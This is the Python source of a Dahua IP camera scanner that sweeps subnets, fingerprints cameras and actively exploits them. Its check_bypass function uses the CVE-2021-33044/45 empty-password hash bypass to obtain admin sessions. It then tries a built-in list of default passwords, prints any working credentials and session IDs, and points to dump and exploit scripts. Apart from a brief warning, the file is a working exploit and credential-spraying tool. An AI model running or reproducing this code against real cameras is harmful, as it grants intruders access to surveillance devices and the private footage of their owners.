README.md
Rendering markdown...
#!/usr/bin/env python3
"""
Dahua IP Camera Network Scanner
================================
CVE-2021-33044 / CVE-2021-33045 Auto-Detection
Scans a subnet (or single host) for Dahua cameras, fingerprints them via
RPC2 and CGI endpoints, checks for authentication bypass vulnerabilities,
and prints a structured summary table.
WARNING: For authorized security testing and educational purposes only.
Do not use against devices without explicit permission.
Usage:
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 8081
python dahua_scanner.py 192.168.1.100:8081
python dahua_scanner.py 192.168.1.0/24 -p 80 8000 8080 -w 100 -o results.json
Output:
- Live progress per host
- ASCII table of discovered cameras
- Optional JSON output with full details
"""
import argparse
import concurrent.futures
import hashlib
import ipaddress
import json
import socket
import sys
import threading
import time
from datetime import datetime
import requests
requests.packages.urllib3.disable_warnings()
#
# Defaults
#
COMMON_PORTS = [80, 8000, 8080, 8081, 8888, 9000, 443, 37777] # Suggestion only
DEFAULT_THREADS = 50
DEFAULT_TIMEOUT = 5
DAHUA_SIGNATURES = [
"dahua", "DH-IPC", "IPC-HDBW", "IPC-HDW", "IPC-HUM",
"/doc/page/login.asp", "NetVideoActiveX", "RPC2_Login",
"loginPage", "NVR", "XVR", "DahuaWeb",
]
DEFAULT_CREDS = [
("admin", ""),
("admin", "admin"),
("admin", "888888"),
("admin", "666666"),
("admin", "123456"),
("666666", "666666"),
("888888", "888888"),
]
#
# RPC2 helpers
#
def rpc2_challenge(target, port, timeout, http=None):
url = f"http://{target}:{port}/RPC2_Login"
try:
r = (http or requests).post(url, json={
"method": "global.login",
"params": {"userName": "admin", "password": "",
"clientType": "Web3.0",
"loginType": "Direct",
"authorityType": "Default",
"passwordType": "Default"},
"id": 1, "session": 0
}, timeout=timeout, verify=False)
data = r.json()
p = data.get("params", {})
return p.get("realm", ""), p.get("random", ""), data.get("session", 0)
except Exception:
return None, None, 0
def _md5hash(s):
return hashlib.md5(s.encode()).hexdigest().upper()
def bypass_hash(user, realm, rnd):
"""CVE-2021-33044/45: empty-password step1."""
s1 = _md5hash(f"{user}:{realm}:")
return _md5hash(f"{s1}:{rnd}:{s1}")
def legit_hash(user, pw, realm, rnd):
s1 = _md5hash(f"{user}:{realm}:{pw}")
return _md5hash(f"{s1}:{rnd}:{s1}")
def rpc2_login(target, port, user, pw_hash, session, timeout, http=None):
try:
r = (http or requests).post(f"http://{target}:{port}/RPC2_Login", json={
"method": "global.login",
"params": {"userName": user, "password": pw_hash,
"clientType": "Web3.0",
"loginType": "Direct",
"authorityType": "Default",
"passwordType": "Default"},
"id": 2, "session": session
}, timeout=timeout, verify=False)
return r.json()
except Exception:
return {}
#
# Detection & fingerprinting
#
def port_open(ip, port, timeout):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
result = s.connect_ex((str(ip), port))
s.close()
return result == 0
except Exception:
return False
def is_dahua(ip, port, timeout):
"""Return True if HTTP response contains any Dahua signature."""
scheme = "https" if port == 443 else "http"
try:
r = requests.get(f"{scheme}://{ip}:{port}/",
timeout=timeout, verify=False, allow_redirects=True)
body_low = r.text.lower()
if any(sig.lower() in body_low for sig in DAHUA_SIGNATURES):
return True
server = r.headers.get("Server", "").lower()
if "dahua" in server or "netsurveillance" in server:
return True
except Exception:
pass
# Try RPC2 endpoint Dahua-specific
try:
r = requests.post(f"http://{ip}:{port}/RPC2_Login",
json={"method": "global.login",
"params": {"userName": "x", "password": "",
"clientType": "Web3.0",
"authorityType": "Default",
"passwordType": "Default"},
"id": 1},
timeout=timeout, verify=False)
data = r.json()
# Dahua always returns params.realm and params.random on step-1
if "realm" in data.get("params", {}):
return True
except Exception:
pass
return False
def fingerprint(ip, port, timeout):
"""Pull device type and firmware version via CGI or HTTP headers."""
base = f"http://{ip}:{port}"
result = {"model": "Unknown", "firmware": "Unknown", "serial": "Unknown", "device_id": ""}
# Try CGI endpoints (requires auth on most devices)
try:
r = requests.get(f"{base}/cgi-bin/magicBox.cgi?action=getDeviceType",
timeout=timeout, verify=False)
if r.status_code == 200 and r.text.strip() and '401' not in r.text:
result["model"] = r.text.strip()[:50]
except Exception:
pass
try:
r = requests.get(f"{base}/cgi-bin/magicBox.cgi?action=getSoftwareVersion",
timeout=timeout, verify=False)
if r.status_code == 200 and r.text.strip() and '401' not in r.text:
result["firmware"] = r.text.strip()[:50]
except Exception:
pass
try:
r = requests.get(f"{base}/cgi-bin/magicBox.cgi?action=getSerialNo",
timeout=timeout, verify=False)
if r.status_code == 200 and r.text.strip() and '401' not in r.text:
result["serial"] = r.text.strip()[:30]
except Exception:
pass
# Fallback: extract device_id from RPC2 realm + firmware date from headers
if result["model"] == "Unknown" or result["firmware"] == "Unknown":
try:
# Get firmware date from Last-Modified header
r = requests.get(f"{base}/", timeout=timeout, verify=False)
last_mod = r.headers.get("Last-Modified", "")
if last_mod and result["firmware"] == "Unknown":
result["firmware"] = f"~{last_mod[:16]}"
except Exception:
pass
try:
# Get device ID from RPC2 realm
r = requests.post(f"{base}/RPC2_Login", json={
"method": "global.login",
"params": {"userName": "x", "password": "", "clientType": "Web3.0",
"loginType": "Direct", "authorityType": "Default", "passwordType": "Default"},
"id": 1, "session": 0
}, timeout=timeout, verify=False)
data = r.json()
realm = data.get("params", {}).get("realm", "")
# Realm format: "Login to <device_id_hash>"
if "Login to " in realm:
result["device_id"] = realm.split("Login to ")[1][:32]
if result["model"] == "Unknown":
result["model"] = f"Dahua-{result['device_id'][:8]}"
except Exception:
pass
return result
#
# Vulnerability checks
#
def check_bypass(ip, port, timeout):
"""CVE-2021-33044/45: returns session_id if vulnerable, else None."""
http = requests.Session()
http.verify = False
realm, rnd, sess = rpc2_challenge(ip, port, timeout, http=http)
if not realm:
return None
bh = bypass_hash("admin", realm, rnd)
resp = rpc2_login(ip, port, "admin", bh, sess, timeout, http=http)
if resp.get("result") is True:
return resp.get("session", "UNKNOWN")
return None
def check_default_creds(ip, port, timeout):
"""Returns (user, pass, session) of first matching default cred, or None."""
http = requests.Session()
http.verify = False
realm, rnd, sess = rpc2_challenge(ip, port, timeout, http=http)
if not realm:
return None
for user, pw in DEFAULT_CREDS:
resp = rpc2_login(ip, port, user, legit_hash(user, pw, realm, rnd), sess, timeout, http=http)
if resp.get("result") is True:
return user, pw, resp.get("session")
return None
#
# Per-host scan
#
def scan_host(ip, ports, timeout, verbose):
ip = str(ip)
for port in ports:
if not port_open(ip, port, timeout):
continue
if not is_dahua(ip, port, timeout):
continue
# Found a Dahua device gather full info
info = fingerprint(ip, port, timeout)
camera = {
"ip": ip,
"port": port,
"model": info["model"],
"firmware": info["firmware"],
"serial": info["serial"],
"device_id": info.get("device_id", ""),
"bypass": None, # session_id or None
"default": None, # (user, pass, session) or None
"cves": [],
}
session = check_bypass(ip, port, timeout)
if session:
camera["bypass"] = session
camera["cves"].append("CVE-2021-33044/45")
cred = check_default_creds(ip, port, timeout)
if cred:
camera["default"] = cred
if verbose:
vuln = ", ".join(camera["cves"]) if camera["cves"] else "none detected"
print(f" [+] {ip}:{port} model={camera['model']} fw={camera['firmware']} vulns={vuln}")
return camera
return None
#
# Network scan
#
def scan_network(network, ports, threads, timeout, verbose):
try:
net = ipaddress.ip_network(network, strict=False)
hosts = list(net.hosts()) if net.num_addresses > 2 else [net.network_address]
except ValueError:
# Single IP (strip port if given as ip:port — port already in ports list)
host = network.split(":")[0] if ":" in network and "/" not in network else network
try:
hosts = [ipaddress.ip_address(host)]
except ValueError:
print(f"[-] Invalid target: {network}", file=sys.stderr)
sys.exit(1)
total = len(hosts)
lock = threading.Lock()
found = []
scanned = [0]
def worker(ip):
result = scan_host(ip, ports, timeout, verbose)
with lock:
scanned[0] += 1
done = scanned[0]
if result:
found.append(result)
if not verbose:
pct = int(done / total * 40)
bar = "#" * pct + "." * (40 - pct)
print(f"\r [{bar}] {done}/{total}", end="", flush=True)
with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as ex:
ex.map(worker, hosts)
if not verbose:
print() # newline after progress bar
return found
#
# Output
#
def print_banner(network, ports, threads, timeout):
print("""
Dahua Camera Network Scanner
CVE-2021-33044 / CVE-2021-33045 auto-check
""")
print(f" Target : {network}")
print(f" Ports : {ports}")
print(f" Threads : {threads} Timeout: {timeout}s")
print(f" Started : {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n")
def print_table(cameras):
if not cameras:
print("\n [-] No Dahua cameras found.\n")
return
col_ip = max(len(c["ip"]) for c in cameras)
col_port = max(len(str(c["port"])) for c in cameras)
col_mod = max(len(c["model"]) for c in cameras)
col_fw = max(len(c["firmware"]) for c in cameras)
col_ip = max(col_ip, 9)
col_port = max(col_port, 4)
col_mod = max(col_mod, 8)
col_fw = max(col_fw, 8)
col_vuln = 24
sep = (f" +-{'-'*col_ip}-+-{'-'*col_port}-+-{'-'*col_mod}-+-"
f"{'-'*col_fw}-+-{'-'*col_vuln}-+")
hdr = (f" | {'IP':<{col_ip}} | {'PORT':<{col_port}} | {'MODEL':<{col_mod}} | "
f"{'FIRMWARE':<{col_fw}} | {'VULNERABILITIES':<{col_vuln}} |")
print(f"\n Found {len(cameras)} Dahua camera(s):\n")
print(sep)
print(hdr)
print(sep)
for c in cameras:
vuln_parts = list(c["cves"])
if c["default"]:
vuln_parts.append(f"creds:{c['default'][0]}:{c['default'][1]!r}")
vuln_str = ", ".join(vuln_parts) if vuln_parts else "none"
print(f" | {c['ip']:<{col_ip}} | {c['port']:<{col_port}} | "
f"{c['model']:<{col_mod}} | {c['firmware']:<{col_fw}} | "
f"{vuln_str:<{col_vuln}} |")
print(sep)
# Highlight critical findings
print()
for c in cameras:
if c["bypass"]:
print(f" [!!!] BYPASS VULN {c['ip']}:{c['port']} session={c['bypass']}")
print(f" -> python dahua_auth_bypass.py {c['ip']} -p {c['port']} --dump")
elif c["default"]:
u, p, _ = c["default"]
print(f" [!] DEFAULT CREDS {c['ip']}:{c['port']} {u}:{p!r}")
print(f" -> python dahua_auth_bypass.py {c['ip']} -p {c['port']} --dump")
else:
print(f" [i] {c['ip']}:{c['port']} no auth issues (run full scan: python dahua_exploit.py {c['ip']})")
print()
def save_json(cameras, path):
out = []
for c in cameras:
row = dict(c)
if row["default"]:
row["default"] = {"user": row["default"][0],
"pass": row["default"][1],
"session": row["default"][2]}
out.append(row)
with open(path, "w") as f:
json.dump({"scan_time": datetime.now().isoformat(),
"cameras": out}, f, indent=2)
print(f" [+] Results saved {path}")
#
# CLI
#
def main():
parser = argparse.ArgumentParser(
description="Dahua IP Camera Network Scanner - CVE-2021-33044/33045 Detection",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=f"""
Examples:
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 8081
python dahua_scanner.py 192.168.1.100:8081
python dahua_scanner.py 192.168.1.0/24 -p 80 8000 8080 -w 100 -v
python dahua_scanner.py 10.0.0.0/24 -p 80 443 8080 -o results.json
Common Dahua ports: {COMMON_PORTS}
WARNING: For authorized security testing only. Do not use without permission.
"""
)
parser.add_argument("network",
help="Subnet (192.168.1.0/24) or single IP (192.168.1.1:8081)")
parser.add_argument("-p", "--ports", nargs="+", type=int,
default=None,
help=f"Ports to scan (required unless using IP:port format). Common: {COMMON_PORTS}")
parser.add_argument("-w", "--threads", type=int,
default=DEFAULT_THREADS,
help=f"Concurrent threads (default: {DEFAULT_THREADS})")
parser.add_argument("-t", "--timeout", type=int,
default=DEFAULT_TIMEOUT,
help=f"Per-connection timeout in seconds (default: {DEFAULT_TIMEOUT})")
parser.add_argument("-o", "--output",
help="Save results to JSON file")
parser.add_argument("-v", "--verbose", action="store_true",
help="Print each camera as discovered (instead of progress bar)")
args = parser.parse_args()
# Support host:port shorthand: dahua_scanner.py 192.168.1.1:8081
if ":" in args.network and "/" not in args.network:
host, port_str = args.network.rsplit(":", 1)
try:
extra_port = int(port_str)
args.network = host
if args.ports is None:
args.ports = [extra_port]
elif extra_port not in args.ports:
args.ports = [extra_port] + args.ports
except ValueError:
pass
# Require ports to be specified
if args.ports is None:
print(f"\n [!] ERROR: No ports specified.")
print(f" [i] Use -p to specify ports, e.g.: -p 80 8080 8081")
print(f" [i] Or use IP:port format, e.g.: 192.168.1.100:8081")
print(f" [i] Common Dahua ports: {COMMON_PORTS}")
print(f"\n Run with --help for full usage.\n")
sys.exit(1)
print_banner(args.network, args.ports, args.threads, args.timeout)
t0 = time.time()
cameras = scan_network(args.network, args.ports,
args.threads, args.timeout, args.verbose)
elapsed = time.time() - t0
print_table(cameras)
print(f" Scan finished in {elapsed:.1f}s")
if args.output:
save_json(cameras, args.output)
sys.exit(0 if cameras else 1)
if __name__ == "__main__":
main()